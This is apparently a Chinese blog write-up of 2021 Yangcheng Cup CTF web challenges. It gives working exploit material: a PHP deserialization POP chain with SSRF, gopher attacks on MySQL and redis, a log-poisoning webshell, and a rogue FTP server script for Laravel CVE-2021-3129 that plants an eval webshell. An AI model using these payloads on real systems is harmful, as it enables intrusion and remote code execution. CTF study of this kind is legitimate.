2021羊城杯(部分web)

最新推荐文章于 2023-09-03 12:01:03 发布
最新推荐文章于 2023-09-03 12:01:03 发布
阅读量1.5k 收藏 6
点赞数 4
文章标签: php mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/120241507
版权

nosql

CockpitCMS NoSQL注入漏洞
参考文章
https://www.anquanke.com/post/id/241113
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

easycurl

扫后台发现app文件,里面有admin的密码R1nd0_1s_n3k0,
登录后可以进到admin.php里面,发现可以执行反序列化,题目提示存在common.php.bak 里面有一堆类,看来是要构造pop链了.
request函数存在ssrf漏洞
在这里插入图片描述

pop链如下

<?php
class User
{
    public $username;
    public $session_id='1';

    public function __construct($username)
    {
        $this->username=$username;
    }
}
class cache_parser{
    public $user;
    public $user_cache='aaa';
    public $default_handler;
    public $logger;

    public function __construct($cache_parser,$url)
    {
        $this->user = new User('aaa');
        $this->logger = $cache_parser;
        $this->default_handler = new file_request($url);
    }


}
class file_request{
    public $url;
    private $content;
    public function __construct($url)
    {
        $this->url=$url;
    }
}
$a=new cache_parser('','file:///etc/passwd')
$b = new cache_parser($a,'');
$c = new User($b);
echo urlencode(serialize($c));

利用的curl
写文件可以发现根目录下存在readflag,但是没有权限运行,正好我们可以利用ssrf打mysql进行udf提权。
利用gopherus工具执行select写入恶意so文件,文件内容参考https://www.sqlsec.com/tools/udf.html
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
成功读到flag。

在这里插入图片描述

Only 4

直接包含/proc/self/fd/8可以看到日志,接着把一句话写入UA头中,cat /f*得到flag。

Cross The Side

laravel debug rce
参考文章https://whoamianony.top/2021/01/15/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Laravel/Laravel%20Debug%20mode%20RCE%EF%BC%88CVE-2021-3129%EF%BC%89%E5%88%A9%E7%94%A8%E5%A4%8D%E7%8E%B0/
在这里插入图片描述
发送上面的数据发现是存在漏洞的。
试了下生成phar然后触发反序列化一直不行,文章里面还有个用ftp ssrf攻击gasetcig的
在这里插入图片描述
在这里插入图片描述
测试了下发现没开9000端口,换成redis的3306端口则出现延迟。猜测是开了redis服务。
先利用gopherus生成payload
脚本如下

import socket
from urllib.parse import unquote
host = '0.0.0.0'
port = 1234
sk = socket.socket()
sk.bind((host, port))
sk.listen(5)
conn,address = sk.accept()
payload = unquote("%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B1%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%247%0D%0Aabc.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A")
payload = payload.encode('utf-8')
conn.send(payload)
conn.close()

import socket
def get(conn):
    conn.send("220 (vsFTPd 3.0.3)\n")
    print conn.recv(200)
    conn.send("331 Please specify the password.\n")
    print conn.recv(200)
    conn.send("230 Login successful.\n")
    print conn.recv(200)
    conn.send("200 Switching to Binary mode.\n")
    print conn.recv(200)
    conn.send("213 3\n")
    print conn.recv(200)
    conn.send("229 Entering Extended Passive Mode (|||1234|)\n")
    print conn.recv(200)
    conn.send("150 Opening BINARY mode data connection for /test/test.php (3 bytes).\n")
    conn.send("226 Transfer complete.\n")
    print conn.recv(200)
    conn.send("221 Goodbye.\n")
    conn.close()
def put(conn):
    conn.send("220 (vsFTPd 3.0.3)\n");
    print conn.recv(20)
    conn.send("331 Please specify the password.\n");
    print conn.recv(20)
    conn.send("230 Login successful.\n")
    print conn.recv(20)
    conn.send("200 Switching to Binary mode.\n");
    print conn.recv(20)
    conn.send("550 Could not get file size.\n");
    print conn.recv(20)
    conn.send("227 127,0,0,1,24,245\n")
    print conn.recv(20)
    conn.send("227 127,0,0,1,24,235\n")
    print conn.recv(20)
    conn.send("150 Ok to send data.\n")
    conn.send("226 Transfer complete.\n")
    print conn.recv(20)
    conn.send("221 Goodbye.\n");
    conn.close()
host = '0.0.0.0'
port = 4567
sk = socket.socket()
sk.bind((host, port))
sk.listen(5)
conn,address = sk.accept()
get(conn)
conn,address=sk.accept()
put(conn)

两个同时运行
在这里插入图片描述

成功生成木马文件

得到flag
在这里插入图片描述

yu22x
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
[羊城2021] wp
Huamang的博客
09-13 1302
baby_ volatility直接看镜像文件,查看cmd filescan找到有一个ssh.txt 想到之前搭建博客的时候就接触这个ssh密钥,拿去base64decode 找到邮箱,去github找用户 在历史commit里面有个这个??RCTF?? 去分析一下这个__APP__ 里面有html 我直接去kali里面foremost一下 打开后找到了一个隐蔽的flag,真难找。。 U2FuZ0ZvcntTMF8zYXp5XzJfY3JhY2tfbm9vYl9wbGF5ZXJ9 解出 签到
[羊城 2021]Baby_Forenisc
qq_51447967的博客
04-28 727
题目分析 下载得到一个raw后缀的文件,先进行内存分析一下 首先分析镜像的系统版本 得到系统的版本是WinXPSP2x86 然后查看进程 没看到什么重要的进程,在最后有一个DumpIt的进程,尝试dump出来进行Foremost分离之后也没发现什么有用的信息。 然后去查看cmd命令 发现用git命令上传了一些文件,然后把本地的文件删除了,说明信息可能在github上了。 查看特定的文件 可以看到有个ssh.txt文件,联系github中的SSH密钥。将得到的SSH密钥用BASE64解析之后可以发现有
2021羊城CTF wp
qq_45603443的博客
09-12 5586
2021羊城WP(部分) ​Web web1 only 4 def start_flag(s): global stop_threads while True: if stop_threads: break f = io.BytesIO(b'a' * 1024 * 50) url = 'http://192.168.41.134:8000/? gwht=/var/lib/php5/sess_1&ycb=http://127.0.0.1' headers = {'Cookie': 'PHPSES
羊城web(eazycon)
分享与记录
09-11 1594
进入题目环境 用dirsearch扫一下 访问 /index.php 由弹窗内容可以联想到一句话木马<?php @eval($_POST['cmd']);?> 蚁剑连接 目录下发现一个.txt 文件 下载该文件 得到很长的一段结尾是等号的字符串,我开始还用base64解码解不出来,真的是蠢,flag哪有那么长,这肯定是一张图片的base64编码呀,写个img标签就能解决(学会新技能了0.0) <img src="data:image/jpeg;base64, 这里是图片的b
2021羊城Web-wp
weixin_45805993的博客
09-12 597
0x01涉及考点 laravel debug cve (CVE-2021-3129) ftp-redis打ssrf 0x02题目分析 扫目录发现一个文件中开启了6379端口和redis的dmp文件,推测要用redis来ssrf 之后了解了CVE-2021-3129 https://xz.aliyun.com/t/9030 大致是Ignition默认提供的vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php中可控f
羊城 2021 web go
F1or_的博客
09-13 271
比赛做不动,靠着赛后复现来学习一下。师傅们tql 一上来就是一个简单的登录页面,题目附件给了源码,打开看看 传入的uname通过text转换为str,一开始我以为是text转换为str的这里可能存在漏洞,上网一搜也没有发现。golang弱比较特性还是比较少,这个方法后面也直接被我排除了,找了好久,哭了。。。 既然这个绕过admin不行,就直接想到修改cookie值来进行身份验证。 全局搜索一下,发现cookie生成代码 这里可以加入一下代码验证一下 但是cookie并没有被解密出来,返还上层发现
2020YCBCTF羊城官方Writeup.pdf
10-28
标题《2020YCBCTF羊城官方Writeup.pdf》中的“YCBCTF”指的是一种名为“羊城”的网络安全竞赛(CTF),这是一个以网络安全为主题的竞赛,CTF全称Capture The Flag,即“夺旗赛”,是一种信息安全竞赛活动。...
2023羊城 DASCTF EZ-Misc
最新发布
09-03
2023羊城 DASCTF EZ-Misc
2020YCBCTF:2020羊城官方writeup及
03-24
2020年 2020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
[羊城2021]web wp
l11III1111的博客
09-12 1137
[羊城2021]web wp 题目页面进去就是源码,传入两个参数一个用来包含,一个来触发反序列化。 <?php highlight_file('index.php'); error_reporting(0); $gwht= $_GET["gwht"]; $ycb= $_GET["ycb"]; if(preg_match("/flag/",$gwht)){ die('hack' ); } if(preg_match("/secret/",$gwht)){ die('hack' ); }
羊城2022 部分web
weixin_43610673的博客
09-05 867
pearcmd.php文件包含,过滤了常用的几个命令选项,但还有个download。写个马丢到vps上,pear的过滤使用url编码绕过。
[WP]2021羊城-Web部分
Y4tacker的博客
09-14 1904
文章目录写在前面WebCross The SideCheckin_GoOnly 4 (非预期解法)Only 4 (预期解法)NO SQLEasyCurl 写在前面 这次拿了第一还是比较开心的,一晚上没睡觉… Web Cross The Side 版本信息Laravel v8.26.1 (PHP v7.4.15) 目录扫描 应该是开启了redis 联系版本号,尝试debug-rce 既然有file_get_contents与file_put_contents,尝试ftp passivemode 成功出
2022羊城 web三题
m0_55042131的博客
09-04 1367
2022羊城wp
羊城2021 Crypto wp
qq_52193383的博客
09-14 1188
1. RSA? 题目: import os from Crypto.Util.number import * ''' flag = "GWHT{xxxxxxxxx}" p = getPrime(256) q = getPrime(256) n = p*q N = (p-1)*(q-1) e = 65537 Mx = bytes_to_long(os.urandom(30)) My = bytes_to_long(flag) Z1 = (Mx*My)%n inv_Z1 = inverse_mod(Z1, n)
2021羊城pwn部分wp
eeeeeight的博客
09-12 6515
前言: 羊城的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
2023年“羊城”网络安全大赛 Web方向题解wp 全
Jay17的博客
09-03 5941
2023年“羊城”网络安全大赛 Web方向题解wp 全
羊城2021-网络安全大赛部分writeup
克格莫(有需要的私信)
09-11 2737
1.签到 <?php echo("SangFor{".md5("28-08-30-07-04-20-02-17-23-01-12-19")."}"); ?> 图1是二八定律(28),图2是八卦(8),图3是三十而立(30),图4是北斗七星(07),图5是江南四大才子(04),图6是歼20(20),图7是两个黄鹂(02),图8是一起来看流星雨(一起谐音17),图9是乔丹的球服(23),图10是一马当先(01),图11是十二星座(12),图12是19点播放的新闻联播(19) ...
2021年9月广州羊城,CRYPTO的BigRsa
沐一 · 林 的博客
09-12 943
2021年9月广州羊城,CRYPTO的BigRsa 下载附件,pub.py: . . 打开文件,发现内容是RSA加密过程: from Crypto.Util.number import * from flag import * n1 = 10383529640908175186077053551474658681539589842726033432568031364836913266105784068082329551223694895337089556841972133117083455781254
2021羊城 Rsa?题解
a5555678744的博客
09-24 407
yafu分解n很快就可以得到p,q但是没什么用 仔细观察getloop可以找到像杨辉三角类似的结构 其中x1是其中的奇数项和,y1是其中的偶数项和 实际上最后得到的x1和y1满足 ((X+aY)^65536)mod n=(s1 + a*s2)mod n 随后根据a = ((inv_Z1-X)*inv_Y)%n ,得知(s1 + a*s2)mod n就是inv Z1 随后算出Z1,得到X 最后Y =(n+x_add_ay-X)*gmpy2.invert(a,n)%n得到flag ...
2020 YCBCTF羊城官方Writeup:PHPWeb安全解题技巧实录
2020YCBCTF羊城官方Writeup是一份详细的竞赛报告,涵盖了该年度网络安全 Capture The Flag (CTF) 比赛中的一系列挑战,主要集中在WebPHP、漏洞利用、密码学、以及逆向工程等不同领域。以下是各个部分的主要知识...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值